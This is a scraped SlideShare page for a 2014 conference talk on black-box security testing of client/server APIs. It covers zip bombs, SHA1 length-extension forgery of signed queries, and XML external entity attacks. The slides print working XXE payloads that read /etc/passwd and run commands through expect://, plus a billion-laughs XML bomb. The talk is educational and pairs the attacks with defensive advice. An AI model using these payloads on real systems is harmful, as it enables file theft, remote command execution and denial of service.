Pentesting client/server API
Sergey Belov
$ whoami
© 2002—2014, Digital Security 2
• Senior Security Auditor at Digital Security
• BugHunter: Google, Yandex, Badoo,...
What we are talking about?
© 2002—2014, Digital Security 3
API
What we are talking about?
© 2002—2014, Digital Security 4
API
Hacking via API
© 2002—2014, Digital Security 5
Hacking via API
© 2002—2014, Digital Security 6
Hacking via API
© 2002—2014, Digital Security 7
From interface to API methods
Hacking via API
© 2002—2014, Digital Security 8
Hacking via API
© 2002—2014, Digital Security 9
Hacking via API
© 2002—2014, Digital Security 10
Hacking via API
© 2002—2014, Digital Security 11
Hacking via API
© 2002—2014, Digital Security 12
What we are should to test?
• Logic!
• Bypassing restrictions (sqli/xss)
...
Hacking via API
© 2002—2014, Digital Security 13
Hacking via API
© 2002—2014, Digital Security 14
ZIP
Hacking via API
© 2002—2014, Digital Security 15
42 kb….
Hacking via API
© 2002—2014, Digital Security 16
42 kb….
…10 GB?
Hacking via API
© 2002—2014, Digital Security 17
42 kb….
…10 GB?
…100 GB?
Hacking via API
© 2002—2014, Digital Security 18
42 kb….
…10 GB?
…100 GB?
…100 TB?
Hacking via API
© 2002—2014, Digital Security 19
42 kb….
…10 GB?
…100 GB?
…100 TB?
…4,5PB! http://www.unforgettable.dk/
Hacking via API
© 2002—2014, Digital Security 20
Say
HELLO
to
ZIP BOMB!
Hacking via API
© 2002—2014, Digital Security 21
Evil of javascript
and
Hacking via API
© 2002—2014, Digital Security 22
Hacking via API
© 2002—2014, Digital Security 23
Hacking via API
© 2002—2014, Digital Security 24
http://habrahabr.ru/post/186160/
Hacking via API
© 2002—2014, Digital Security 25
Crypto
Hacking via API
© 2002—2014, Digital Security 26
Query signing
Sign = sha*(…+DATA+…)
api key
Hacking via API
© 2002—2014, Digital Security 27
Hacking via API
© 2002—2014, Digital Security 28
But why?
Hacking via API
© 2002—2014, Digital Security 29
Say hello again.
To length extension attack
Hacking via API
© 2002—2014, Digital Security 30
A=1&B=2&C=3
07ce36c769ae130708258fb5dfa3d37ca5a67514
TOKEN=sha1(KEY+DATA)
Hacking via API
© 2002—2014, Digital Security 31
Some has hijacked just 1 request…
Hacking via API
© 2002—2014, Digital Security 32
What attacker know?
• Original data
• Sign (token)
Hacking via API
© 2002—2014, Digital Security 33
What attacker want?
Change some data / change params
Hacking via API
© 2002—2014, Digital Security 34
A=1&B=2&C=3x80x00x00…x02&C=4
Hacking via API
© 2002—2014, Digital Security 35
Can sign new query without api key!
Vkontakte: sig = md5(name1=value1name...
Hacking via API
© 2002—2014, Digital Security 36
Request hijacking…
How?
Hacking via API
© 2002—2014, Digital Security 37
Hacking via API
© 2002—2014, Digital Security 38
Hacking via API
© 2002—2014, Digital Security 39
Hacking via API
© 2002—2014, Digital Security 40
Hacking via API
© 2002—2014, Digital Security 41
Hacking via API
© 2002—2014, Digital Security 42
Hacking via API
© 2002—2014, Digital Security 43
Hacking via API
© 2002—2014, Digital Security 44
Hacking via API
© 2002—2014, Digital Security 45
XML? XML entities!
Hacking via API
© 2002—2014, Digital Security 46
DTD Example:
<!ENTITY writer "Donald Duck.">
<!ENTITY copyright "Copyrigh...
Hacking via API
© 2002—2014, Digital Security 47
XML entities?
External Entity!
Hacking via API
© 2002—2014, Digital Security 48
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM
"file:///etc/pass...
Hacking via API
© 2002—2014, Digital Security 49
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM
“expect://id" >]>...
Hacking via API
© 2002—2014, Digital Security 50
XML Bombs!
Hacking via API
© 2002—2014, Digital Security 51
<?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz...
What we are talking about?
© 2002—2014, Digital Security 52
Man in the Middle
Hacking via API
© 2002—2014, Digital Security 53
Examples?
Hacking via API
© 2002—2014, Digital Security 54
2013-11-19 by Reginaldo Silva
Hacking via API
© 2002—2014, Digital Security 55
https://www.facebook.com/BugBounty/posts/778897822124446
http://www.uberc...
Hacking via API
© 2002—2014, Digital Security 56
Testing:
• https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWA...
Hacking via API
© 2002—2014, Digital Security 57
Finally:
• Re-test all interface restrictions;
• Specific compressions;
•...
twitter.com/sergeybelove
sbelov@dsec.ru
© 2002—2014, Digital Security
Digital Security в Москве: (495) 223-07-86
Digital S...
Upcoming SlideShare
Loading in …5
×

CodeFest 2014. Белов С. — BlackBox тестирование безопасности клиент-серверного API

2,278 views

Published on

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
2,278
On SlideShare
0
From Embeds
0
Number of Embeds
1,143
Actions
Shares
0
Downloads
9
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

CodeFest 2014. Белов С. — BlackBox тестирование безопасности клиент-серверного API

  1. 1. Pentesting client/server API Sergey Belov
  2. 2. $ whoami © 2002—2014, Digital Security 2 • Senior Security Auditor at Digital Security • BugHunter: Google, Yandex, Badoo, Yahoo +++ • Writer: habrahabr, ”Xakep” magazine • CTF: DEFCON 2012 CTF Final, Chaos Construction CTF’2013 • Speaker: CodeFest 2012, ZeroNights 0x03 • Trainer: Hack in Paris’2014, BlackHat’2014 USA (soon)
  3. 3. What we are talking about? © 2002—2014, Digital Security 3 API
  4. 4. What we are talking about? © 2002—2014, Digital Security 4 API
  5. 5. Hacking via API © 2002—2014, Digital Security 5
  6. 6. Hacking via API © 2002—2014, Digital Security 6
  7. 7. Hacking via API © 2002—2014, Digital Security 7 From interface to API methods
  8. 8. Hacking via API © 2002—2014, Digital Security 8
  9. 9. Hacking via API © 2002—2014, Digital Security 9
  10. 10. Hacking via API © 2002—2014, Digital Security 10
  11. 11. Hacking via API © 2002—2014, Digital Security 11
  12. 12. Hacking via API © 2002—2014, Digital Security 12 What we are should to test? • Logic! • Bypassing restrictions (sqli/xss) • Parameter tampering Developing • Stop hacks and custom realization in API! Really
  13. 13. Hacking via API © 2002—2014, Digital Security 13
  14. 14. Hacking via API © 2002—2014, Digital Security 14 ZIP
  15. 15. Hacking via API © 2002—2014, Digital Security 15 42 kb….
  16. 16. Hacking via API © 2002—2014, Digital Security 16 42 kb…. …10 GB?
  17. 17. Hacking via API © 2002—2014, Digital Security 17 42 kb…. …10 GB? …100 GB?
  18. 18. Hacking via API © 2002—2014, Digital Security 18 42 kb…. …10 GB? …100 GB? …100 TB?
  19. 19. Hacking via API © 2002—2014, Digital Security 19 42 kb…. …10 GB? …100 GB? …100 TB? …4,5PB! http://www.unforgettable.dk/
  20. 20. Hacking via API © 2002—2014, Digital Security 20 Say HELLO to ZIP BOMB!
  21. 21. Hacking via API © 2002—2014, Digital Security 21 Evil of javascript and
  22. 22. Hacking via API © 2002—2014, Digital Security 22
  23. 23. Hacking via API © 2002—2014, Digital Security 23
  24. 24. Hacking via API © 2002—2014, Digital Security 24 http://habrahabr.ru/post/186160/
  25. 25. Hacking via API © 2002—2014, Digital Security 25 Crypto
  26. 26. Hacking via API © 2002—2014, Digital Security 26 Query signing Sign = sha*(…+DATA+…) api key
  27. 27. Hacking via API © 2002—2014, Digital Security 27
  28. 28. Hacking via API © 2002—2014, Digital Security 28 But why?
  29. 29. Hacking via API © 2002—2014, Digital Security 29 Say hello again. To length extension attack
  30. 30. Hacking via API © 2002—2014, Digital Security 30 A=1&B=2&C=3 07ce36c769ae130708258fb5dfa3d37ca5a67514 TOKEN=sha1(KEY+DATA)
  31. 31. Hacking via API © 2002—2014, Digital Security 31 Some has hijacked just 1 request…
  32. 32. Hacking via API © 2002—2014, Digital Security 32 What attacker know? • Original data • Sign (token)
  33. 33. Hacking via API © 2002—2014, Digital Security 33 What attacker want? Change some data / change params
  34. 34. Hacking via API © 2002—2014, Digital Security 34 A=1&B=2&C=3x80x00x00…x02&C=4
  35. 35. Hacking via API © 2002—2014, Digital Security 35 Can sign new query without api key! Vkontakte: sig = md5(name1=value1name2=value2api_secret) Mail.RU sig = md5(uid + params + private_key) http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack
  36. 36. Hacking via API © 2002—2014, Digital Security 36 Request hijacking… How?
  37. 37. Hacking via API © 2002—2014, Digital Security 37
  38. 38. Hacking via API © 2002—2014, Digital Security 38
  39. 39. Hacking via API © 2002—2014, Digital Security 39
  40. 40. Hacking via API © 2002—2014, Digital Security 40
  41. 41. Hacking via API © 2002—2014, Digital Security 41
  42. 42. Hacking via API © 2002—2014, Digital Security 42
  43. 43. Hacking via API © 2002—2014, Digital Security 43
  44. 44. Hacking via API © 2002—2014, Digital Security 44
  45. 45. Hacking via API © 2002—2014, Digital Security 45 XML? XML entities!
  46. 46. Hacking via API © 2002—2014, Digital Security 46 DTD Example: <!ENTITY writer "Donald Duck."> <!ENTITY copyright "Copyright W3Schools."> XML example: <author>&writer;&copyright;</author>
  47. 47. Hacking via API © 2002—2014, Digital Security 47 XML entities? External Entity!
  48. 48. Hacking via API © 2002—2014, Digital Security 48 <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>
  49. 49. Hacking via API © 2002—2014, Digital Security 49 <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM “expect://id" >]> <foo>&xxe;</foo>
  50. 50. Hacking via API © 2002—2014, Digital Security 50 XML Bombs!
  51. 51. Hacking via API © 2002—2014, Digital Security 51 <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz>
  52. 52. What we are talking about? © 2002—2014, Digital Security 52 Man in the Middle
  53. 53. Hacking via API © 2002—2014, Digital Security 53 Examples?
  54. 54. Hacking via API © 2002—2014, Digital Security 54 2013-11-19 by Reginaldo Silva
  55. 55. Hacking via API © 2002—2014, Digital Security 55 https://www.facebook.com/BugBounty/posts/778897822124446 http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution
  56. 56. Hacking via API © 2002—2014, Digital Security 56 Testing: • https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008) • XXE to RCE https://gist.github.com/joernchen/3623896 Development: • Disable entities
  57. 57. Hacking via API © 2002—2014, Digital Security 57 Finally: • Re-test all interface restrictions; • Specific compressions; • JS callbacks; • Crypto + SSL test + hardcoded credentials (hackapp.com); • XML - XXE; • Anything else :]
  58. 58. twitter.com/sergeybelove sbelov@dsec.ru © 2002—2014, Digital Security Digital Security в Москве: (495) 223-07-86 Digital Security в Санкт-Петербурге: (812) 703-15-47 58 Hacking via API Thanks for your attention! Questions?

×